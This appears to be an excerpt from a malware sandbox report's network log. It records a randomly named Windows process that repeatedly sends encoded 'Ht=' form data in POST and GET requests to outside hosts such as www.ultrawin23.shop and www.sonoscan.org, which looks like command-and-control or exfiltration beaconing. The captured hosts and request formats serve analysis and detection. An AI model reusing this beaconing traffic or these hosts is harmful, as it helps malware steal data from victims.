                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                          Nov 15, 2024 09:32:38.015625954 CET212INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                          Nov 15, 2024 09:32:38.015640020 CET1236INData Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65
                                                          Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                          Nov 15, 2024 09:32:38.015655041 CET1236INData Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73
                                                          Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                          Nov 15, 2024 09:32:38.015671015 CET1236INData Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70
                                                          Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                          Nov 15, 2024 09:32:38.015687943 CET666INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.1149990170.39.213.43803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:43.527249098 CET597OUTPOST /53y2/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.ultrawin23.shop
                                                          Origin: http://www.ultrawin23.shop
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.ultrawin23.shop/53y2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 67 39 68 79 30 71 79 32 66 52 52 74 46 2b 48 39 69 4f 63 54 30 78 64 59 74 35 74 6a 6c 5a 5a 42 31 4e 30 4d 63 52 62 37 6b 55 62 33 71 55 32 61 73 7a 34 63 6f 39 47 41 38 63 54 53 39 45 34 62 67 48 59 66 52 73 52 4b 54 30 52 68 6d 39 73 48 70 5a 79 79 67 68 52 65 61 53 53 43 4f 62 71 77 46 33 43 36 31 36 61 4e 55 4d 73 67 73 71 69 43 65 52 48 6c 66 46 4e 78 74 2f 79 4f 51 7a 30 34 48 39 58 73 6e 31 50 69 66 52 68 2b 51 4e 72 53 42 37 74 4e 71 4e 42 59 4e 55 44 43 66 78 33 7a 4e 79 73 6d 32 58 52 32 4f 32 33 65 73 62 58 52 39 58 77 58 39 71 4f 46 6d 6a 64 47 58 6f 62 5a 66 77 3d 3d
                                                          Data Ascii: Ht=g9hy0qy2fRRtF+H9iOcT0xdYt5tjlZZB1N0McRb7kUb3qU2asz4co9GA8cTS9E4bgHYfRsRKT0Rhm9sHpZyyghReaSSCObqwF3C616aNUMsgsqiCeRHlfFNxt/yOQz04H9Xsn1PifRh+QNrSB7tNqNBYNUDCfx3zNysm2XR2O23esbXR9XwX9qOFmjdGXobZfw==
                                                          Nov 15, 2024 09:32:44.114614964 CET907INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 707
                                                          date: Fri, 15 Nov 2024 08:32:44 GMT
                                                          server: LiteSpeed
                                                          location: https://www.ultrawin23.shop/53y2/
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.1149991170.39.213.43803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:46.072084904 CET617OUTPOST /53y2/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.ultrawin23.shop
                                                          Origin: http://www.ultrawin23.shop
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.ultrawin23.shop/53y2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 67 39 68 79 30 71 79 32 66 52 52 74 47 66 33 39 75 4e 30 54 78 52 64 62 78 70 74 6a 2b 4a 5a 46 31 4e 6f 4d 63 55 72 52 6b 47 76 33 6b 57 2b 61 2b 6e 73 63 6d 64 47 41 6b 4d 53 57 7a 6b 34 53 67 48 63 70 52 73 39 4b 54 30 56 68 6d 34 49 48 70 75 47 39 67 78 52 59 44 43 53 45 42 37 71 77 46 33 43 36 31 36 65 6e 55 4b 45 67 74 61 53 43 59 31 62 6d 42 56 4e 32 73 2f 79 4f 55 7a 30 38 48 39 58 30 6e 33 37 49 66 55 39 2b 51 50 44 53 43 71 74 4f 2f 64 42 6b 43 30 43 2b 58 54 66 35 4c 78 6c 38 39 56 68 52 4e 6c 58 4a 6b 39 61 4c 74 30 35 41 2b 35 47 48 79 46 38 32 65 5a 2b 51 45 35 42 69 2f 72 71 56 6d 4a 57 33 61 5a 70 45 6a 57 70 47 4b 37 59 3d
                                                          Data Ascii: Ht=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGv3kW+a+nscmdGAkMSWzk4SgHcpRs9KT0Vhm4IHpuG9gxRYDCSEB7qwF3C616enUKEgtaSCY1bmBVN2s/yOUz08H9X0n37IfU9+QPDSCqtO/dBkC0C+XTf5Lxl89VhRNlXJk9aLt05A+5GHyF82eZ+QE5Bi/rqVmJW3aZpEjWpGK7Y=
                                                          Nov 15, 2024 09:32:46.651662111 CET907INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 707
                                                          date: Fri, 15 Nov 2024 08:32:46 GMT
                                                          server: LiteSpeed
                                                          location: https://www.ultrawin23.shop/53y2/
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.1149992170.39.213.43803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:48.616911888 CET1630OUTPOST /53y2/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.ultrawin23.shop
                                                          Origin: http://www.ultrawin23.shop
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.ultrawin23.shop/53y2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 67 39 68 79 30 71 79 32 66 52 52 74 47 66 33 39 75 4e 30 54 78 52 64 62 78 70 74 6a 2b 4a 5a 46 31 4e 6f 4d 63 55 72 52 6b 47 58 33 6b 6b 47 61 73 56 45 63 6c 64 47 41 36 63 53 62 7a 6b 35 51 67 44 34 31 52 73 42 38 54 32 64 68 70 2b 45 48 72 63 75 39 76 78 52 59 4d 69 53 46 4f 62 71 70 46 30 36 32 31 36 75 6e 55 4b 45 67 74 59 4b 43 50 78 48 6d 47 6c 4e 78 74 2f 79 43 51 7a 30 41 48 39 66 4b 6e 33 2f 79 65 6e 6c 2b 51 76 54 53 44 63 52 4f 69 74 42 63 4c 6b 43 6d 58 54 43 6a 4c 31 39 34 39 52 6f 45 4e 69 6a 4a 6e 6f 44 66 77 6e 46 44 38 76 2b 42 76 6b 45 6f 56 59 4f 4b 49 70 35 6b 75 62 71 6b 35 4d 71 71 53 71 42 41 2b 55 70 65 52 4d 77 4b 75 4c 70 64 78 34 56 32 4f 48 53 75 77 6b 49 5a 72 67 70 6d 73 63 36 47 64 39 4f 72 67 42 35 4a 4a 76 4a 4e 48 36 6d 43 59 36 72 52 66 63 32 6e 4c 66 31 79 35 43 48 76 58 63 61 32 4e 56 62 79 4d 53 52 35 56 4a 37 73 74 61 37 66 54 4f 46 61 41 63 47 6c 45 6c 67 71 6c 2b 6c 4e 76 37 37 36 46 79 74 70 57 68 79 35 6e 5a 30 65 78 32 48 36 73 37 2b 73 76 5a 4c [TRUNCATED]
                                                          Data Ascii: Ht=g9hy0qy2fRRtGf39uN0TxRdbxptj+JZF1NoMcUrRkGX3kkGasVEcldGA6cSbzk5QgD41RsB8T2dhp+EHrcu9vxRYMiSFObqpF06216unUKEgtYKCPxHmGlNxt/yCQz0AH9fKn3/yenl+QvTSDcROitBcLkCmXTCjL1949RoENijJnoDfwnFD8v+BvkEoVYOKIp5kubqk5MqqSqBA+UpeRMwKuLpdx4V2OHSuwkIZrgpmsc6Gd9OrgB5JJvJNH6mCY6rRfc2nLf1y5CHvXca2NVbyMSR5VJ7sta7fTOFaAcGlElgql+lNv776FytpWhy5nZ0ex2H6s7+svZLn7DmyXvMmd3aLA5/VHurovv4F/sD9I16Yzn8aPr1PqGrXy01bWU9d9SVQVm569oxo1ZJ/W/8Kdwfr41aNf6EkbGsJgg3xF6SDMEYnQT7SGGI2w8RzxmUDU41oaVVrGh5hDzGr+wOdG5gTtsZMmagn+fS+rWuY1ScZyku+lFII3PqeBLjHiLd3HABbfTJ6lL+pUm9irYW4qceWIUq0lBU4PqKlU4FMIotypcU/6MYnWYIIYsbDugL+sUjvy6BqxYqWm3MSIgJ2A+M3/muE16ZEGuFrlF+LL3qvhLTGRZAeS4HvKoPZ6Efq5RQdvJCcxykkmx+yCfiGfcpwsLHoboMtxZvLJsGSwSvrWZHYgbHdu0VvO2MOPk+XgsLqU5BUff0bdON1zy0V2MbLeHmTvciUXMhmieRGry7x0wPjR1McpjKox0KO/DIi6gVT3OLLRe4JeH2THvPGc4py9SV42LB4Wm0904Q2LQIoaWRA0kbUnTq8CQQ5BYp4C8hMBHMcQQaHWGdQylaml6dcA4d/4GVPxhI7kG6mMVJ0+N/LkC/+NMCQElOq91Aq26AMEyysRt6Z0TFPrLNxtbXgxlE7UnJxDDrpp131WI4m0GsUHEcphk+7SbR76Bg19NMgp/s9Pqf+8q0O8emTH4Na7gMIeRtmh3ZaUQrTDufEv [TRUNCATED]
                                                          Nov 15, 2024 09:32:49.193069935 CET907INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 707
                                                          date: Fri, 15 Nov 2024 08:32:49 GMT
                                                          server: LiteSpeed
                                                          location: https://www.ultrawin23.shop/53y2/
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.1149993170.39.213.43803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:51.160948038 CET327OUTGET /53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.ultrawin23.shop
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:51.740057945 CET1047INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 707
                                                          date: Fri, 15 Nov 2024 08:32:51 GMT
                                                          server: LiteSpeed
                                                          location: https://www.ultrawin23.shop/53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8X
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.114999413.248.169.48803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:56.809571981 CET588OUTPOST /ew98/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.sonoscan.org
                                                          Origin: http://www.sonoscan.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.sonoscan.org/ew98/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 61 43 6a 30 66 4a 4e 72 66 58 4f 71 79 46 7a 70 58 75 35 66 6c 30 34 79 38 36 78 56 51 72 6a 64 39 49 36 6b 5a 6c 55 6b 44 78 6d 6d 2f 37 36 56 73 70 41 78 63 48 54 4e 47 67 73 65 7a 63 4a 46 4b 50 6c 4a 61 4e 6f 58 37 78 69 67 58 74 59 6c 6b 77 66 75 78 45 65 6d 74 68 66 6b 44 42 65 73 79 67 47 65 37 45 46 36 78 2b 4c 32 35 4d 7a 32 45 47 39 35 35 6f 7a 5a 78 37 6d 2b 4e 6d 5a 64 51 57 58 6d 4d 51 32 76 63 32 79 56 68 2b 35 48 38 55 67 30 75 48 4e 6c 45 6a 4b 73 4d 34 66 2b 53 45 7a 32 30 31 76 31 33 2f 30 56 45 4e 58 64 53 65 37 69 53 41 3d 3d
                                                          Data Ascii: Ht=OTBcpjr66R9YaCj0fJNrfXOqyFzpXu5fl04y86xVQrjd9I6kZlUkDxmm/76VspAxcHTNGgsezcJFKPlJaNoX7xigXtYlkwfuxEemthfkDBesygGe7EF6x+L25Mz2EG955ozZx7m+NmZdQWXmMQ2vc2yVh+5H8Ug0uHNlEjKsM4f+SEz201v13/0VENXdSe7iSA==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.114999513.248.169.48803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:32:59.355031013 CET608OUTPOST /ew98/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.sonoscan.org
                                                          Origin: http://www.sonoscan.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.sonoscan.org/ew98/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Raw: 48 74 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 49 58 7a 30 4d 2b 68 72 55 58 4f 74 72 31 7a 70 41 2b 35 6c 6c 30 30 79 38 2f 52 46 54 5a 33 64 38 74 47 6b 59 6b 55 6b 41 78 6d 6d 33 62 36 55 78 5a 41 76 63 48 58 6a 47 69 49 65 7a 63 64 46 4b 4e 74 4a 62 2b 77 55 34 42 69 69 4d 39 59 6a 35 67 66 75 78 45 65 6d 74 6c 33 65 44 41 36 73 79 78 57 65 37 6c 46 35 34 65 4c 31 2b 4d 7a 32 56 57 39 39 35 6f 7a 72 78 2b 47 59 4e 6b 68 64 51 53 62 6d 4d 42 32 77 57 32 79 66 75 65 35 55 78 6b 35 51 67 6c 52 78 46 78 53 5a 43 35 62 79 54 43 2b 73 6b 57 6d 69 30 73 38 58 51 72 32 74 62 76 65 72 4a 49 57 4c 56 45 49 58 42 56 72 52 69 6b 67 51 2b 70 37 50 5a 63 41 3d
                                                          Data Ascii: Ht=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZ3d8tGkYkUkAxmm3b6UxZAvcHXjGiIezcdFKNtJb+wU4BiiM9Yj5gfuxEemtl3eDA6syxWe7lF54eL1+Mz2VW995ozrx+GYNkhdQSbmMB2wW2yfue5Uxk5QglRxFxSZC5byTC+skWmi0s8XQr2tbverJIWLVEIXBVrRikgQ+p7PZcA=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.114999613.248.169.48803732C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 15, 2024 09:33:01.899226904 CET1621OUTPOST /ew98/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.sonoscan.org
                                                          Origin: http://www.sonoscan.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.sonoscan.org/ew98/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
